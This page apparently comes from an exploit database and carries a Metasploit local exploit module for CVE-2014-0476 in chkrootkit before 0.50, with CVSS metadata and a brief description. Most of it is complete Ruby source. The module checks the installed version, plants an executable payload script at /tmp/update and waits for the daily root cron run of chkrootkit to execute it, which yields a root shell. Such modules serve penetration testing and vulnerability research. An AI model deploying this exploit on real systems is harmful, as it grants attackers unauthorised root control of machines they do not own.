Chkrootkit Local Privilege Escalation

2015-11-1818:50:57

Thomas Stangner, Julien "jvoisin" Voisin

www.rapid7.com

CVSS2

3.7

Attack Vector

LOCAL

Attack Complexity

HIGH

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:L/AC:H/Au:N/C:P/I:P/A:P

JSON

Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privilege escalation. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local

  # This could also be Excellent, but since it requires
  # up to one day to pop a shell, let's set it to Manual instead.
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Chkrootkit Local Privilege Escalation',
        'Description' => %q{
          Chkrootkit before 0.50 will run any executable file named /tmp/update
          as root, allowing a trivial privilege escalation.

          WfsDelay is set to 24h, since this is how often a chkrootkit scan is
          scheduled by default.
        },
        'Author' => [
          'Thomas Stangner', # Original exploit
          'Julien "jvoisin" Voisin' # Metasploit module
        ],
        'References' => [
          ['CVE', '2014-0476'],
          ['OSVDB', '107710'],
          ['EDB', '33899'],
          ['BID', '67813'],
          ['URL', 'https://seclists.org/oss-sec/2014/q2/430']
        ],
        'DisclosureDate' => '2014-06-04',
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'SessionTypes' => ['shell', 'meterpreter'],
        'Privileged' => true,
        'Stance' => Msf::Exploit::Stance::Passive,
        'Targets' => [['Automatic', {}]],
        'DefaultTarget' => 0,
        'DefaultOptions' => { 'WfsDelay' => 24.hours.seconds.to_i },
        'Notes' => {
          'Reliability' => [REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
    ])
  end

  def check
    version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")

    if version =~ /chkrootkit version 0\.[1-4]/
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end

  def exploit
    print_warning('Rooting depends on the crontab (this could take a while)')

    write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
    cmd_exec('chmod +x /tmp/update')
    register_file_for_cleanup('/tmp/update')

    print_status('Payload written to /tmp/update')
    print_status('Waiting for chkrootkit to run via cron...')
  end
end